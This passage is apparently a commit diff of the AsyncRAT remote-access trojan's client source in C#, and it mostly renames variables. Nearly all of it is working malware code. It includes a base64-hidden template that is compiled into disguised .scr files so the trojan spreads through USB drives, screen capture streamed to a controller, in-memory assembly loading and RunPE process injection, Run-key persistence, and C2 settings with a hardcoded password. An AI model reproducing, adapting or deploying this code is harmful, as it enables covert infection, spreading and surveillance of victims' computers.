string Source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9")); string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
Source = Source.Replace("%Payload%", Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile); source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
Source = Source.Replace("%File%", InfectedFile.Insert(3, spreadSettings.WorkDirectory + "\\")); source = source.Replace("%File%", infectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
Source = Source.Replace("%Lime%", spreadSettings.InfectedTrademark); source = source.Replace("%Lime%", spreadSettings.InfectedTrademark);
Source = Source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12))); source = source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
Source = Source.Replace("%Guid%", Guid.NewGuid().ToString()); source = source.Replace("%Guid%", Guid.NewGuid().ToString());
CompilerParameters CParams = new CompilerParameters(); CompilerParameters cParams = new CompilerParameters();
Dictionary<string, string> ProviderOptions = new Dictionary<string, string>(); Dictionary<string, string> providerOptions = new Dictionary<string, string>();
ProviderOptions.Add("CompilerVersion", GetOS()); providerOptions.Add("CompilerVersion", GetOS());
string options = "/target:winexe /platform:x86 /optimize+"; string options = "/target:winexe /platform:x86 /optimize+";
if (File.Exists(Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(InfectedFile.Replace(" ", null)) + ".ico")) if (File.Exists(Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"))
options += " /win32icon:\"" + Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(InfectedFile.Replace(" ", null)) + ".ico" + "\""; options += " /win32icon:\"" + Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico" + "\"";
CParams.GenerateExecutable = true; cParams.GenerateExecutable = true;
CParams.OutputAssembly = InfectedFile + ".scr"; cParams.OutputAssembly = infectedFile + ".scr";
CParams.CompilerOptions = options; cParams.CompilerOptions = options;
CParams.TreatWarningsAsErrors = false; cParams.TreatWarningsAsErrors = false;
CParams.IncludeDebugInformation = false; cParams.IncludeDebugInformation = false;
CParams.ReferencedAssemblies.Add("System.dll"); cParams.ReferencedAssemblies.Add("System.dll");
CompilerResults Results = new CSharpCodeProvider(ProviderOptions).CompileAssemblyFromSource(CParams, Source); CompilerResults results = new CSharpCodeProvider(providerOptions).CompileAssemblyFromSource(cParams, source);
} }
catch (Exception ex) catch (Exception ex)
{ {
@ -189,8 +189,8 @@ namespace Client.Handle_Packet
private string GetOS() private string GetOS()
{ {
var OS = new Microsoft.VisualBasic.Devices.ComputerInfo(); var os = new Microsoft.VisualBasic.Devices.ComputerInfo();
if (OS.OSFullName.Contains("7")) if (os.OSFullName.Contains("7"))
return "v2.0"; return "v2.0";
else else
return "v4.0"; return "v4.0";

6
AsyncRAT-C#/Client/Handle Packet/RemoteDesktop.cs
View File

@ -12,15 +12,15 @@ namespace Client.Handle_Packet
{ {
class RemoteDesktop class RemoteDesktop
{ {
public static bool RemoteDesktop_Status { get; set; } public static bool RemoteDesktopStatus { get; set; }
public static void CaptureAndSend() public static void CaptureAndSend()
{ {
try try
{ {
IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(60); IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(60);
while (RemoteDesktop_Status == true) while (RemoteDesktopStatus == true)
{ {
if (!ClientSocket.Client.Connected) break; if (!ClientSocket.Client.Connected) RemoteDesktopStatus = false;
Bitmap bmp = GetScreen(); Bitmap bmp = GetScreen();
Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height); Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
Size size = new Size(bmp.Width, bmp.Height); Size size = new Size(bmp.Width, bmp.Height);

26
AsyncRAT-C#/Client/Handle Packet/SendToMemory.cs
View File

@ -9,27 +9,27 @@ namespace Client.Handle_Packet
{ {
public static void Reflection(object obj) public static void Reflection(object obj)
{ {
object[] Obj = (object[])obj; object[] parameters = (object[])obj;
byte[] Buffer = (byte[])Obj[0]; byte[] buffer = (byte[])parameters[0];
Assembly Loader = Assembly.Load(Buffer); Assembly loader = Assembly.Load(buffer);
object[] Parameters = null; object[] parm = null;
if (Loader.EntryPoint.GetParameters().Length > 0) if (loader.EntryPoint.GetParameters().Length > 0)
{ {
Parameters = new object[] { new string[] { null } }; parm = new object[] { new string[] { null } };
} }
Loader.EntryPoint.Invoke(null, Parameters); loader.EntryPoint.Invoke(null, parm);
} }
public static void RunPE(object obj) public static void RunPE(object obj)
{ {
try try
{ {
object[] Parameters = (object[])obj; object[] parameters = (object[])obj;
byte[] File = (byte[])Parameters[0]; byte[] file = (byte[])parameters[0];
string Injection = Convert.ToString(Parameters[1]); string injection = Convert.ToString(parameters[1]);
byte[] Plugin = (byte[])Parameters[2]; byte[] plugin = (byte[])parameters[2];
Assembly Loader = Assembly.Load(Plugin); Assembly loader = Assembly.Load(plugin);
Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) }); loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { file, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), injection) });
} }
catch { } catch { }
} }

12
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -27,14 +27,14 @@ namespace Client.Install
} }
} }
FileStream Drop; FileStream fs;
if (File.Exists(Settings.ClientFullPath)) if (File.Exists(Settings.ClientFullPath))
Drop = new FileStream(Settings.ClientFullPath, FileMode.Create); fs = new FileStream(Settings.ClientFullPath, FileMode.Create);
else else
Drop = new FileStream(Settings.ClientFullPath, FileMode.CreateNew); fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
byte[] Client = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
Drop.Write(Client, 0, Client.Length); fs.Write(clientExe, 0, clientExe.Length);
Drop.Dispose(); fs.Dispose();
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
Methods.CloseMutex(); Methods.CloseMutex();

2
AsyncRAT-C#/Client/Settings.cs
View File

@ -8,7 +8,7 @@ namespace Client
{ {
public static readonly string Ports = "6606"; public static readonly string Ports = "6606";
public static readonly string Host = "127.0.0.1"; public static readonly string Host = "127.0.0.1";
public static readonly string Version = "AsyncRAT 0.4B"; public static readonly string Version = "AsyncRAT 0.4C";
public static readonly string Install = "false"; public static readonly string Install = "false";
public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static readonly string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT"; public static string Password = "NYAN CAT";

12
AsyncRAT-C#/Client/Sockets/ClientSocket.cs
View File

@ -93,12 +93,12 @@ namespace Client.Sockets
return; return;
} }
int Recevied = Client.EndReceive(Iar); int recevied = Client.EndReceive(Iar);
if (Recevied > 0) if (recevied > 0)
{ {
if (BufferRecevied == false) if (BufferRecevied == false)
{ {
MS.Write(Buffer, 0, Recevied); MS.Write(Buffer, 0, recevied);
Buffersize = BitConverter.ToInt32(MS.ToArray(), 0); Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///"); Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///");
MS.Dispose(); MS.Dispose();
@ -111,7 +111,7 @@ namespace Client.Sockets
} }
else else
{ {
MS.Write(Buffer, 0, Recevied); MS.Write(Buffer, 0, recevied);
if (MS.Length == Buffersize) if (MS.Length == Buffersize)
{ {
ThreadPool.QueueUserWorkItem(HandlePacket.Read, Settings.aes256.Decrypt(MS.ToArray())); ThreadPool.QueueUserWorkItem(HandlePacket.Read, Settings.aes256.Decrypt(MS.ToArray()));
@ -138,7 +138,7 @@ namespace Client.Sockets
} }
} }
public static void BeginSend(byte[] Msg) public static void BeginSend(byte[] msg)
{ {
lock (SendSync) lock (SendSync)
{ {
@ -150,7 +150,7 @@ namespace Client.Sockets
return; return;
} }
byte[] buffer = Settings.aes256.Encrypt(Msg); byte[] buffer = Settings.aes256.Encrypt(msg);
byte[] buffersize = BitConverter.GetBytes(buffer.Length); byte[] buffersize = BitConverter.GetBytes(buffer.Length);
Client.Poll(-1, SelectMode.SelectWrite); Client.Poll(-1, SelectMode.SelectWrite);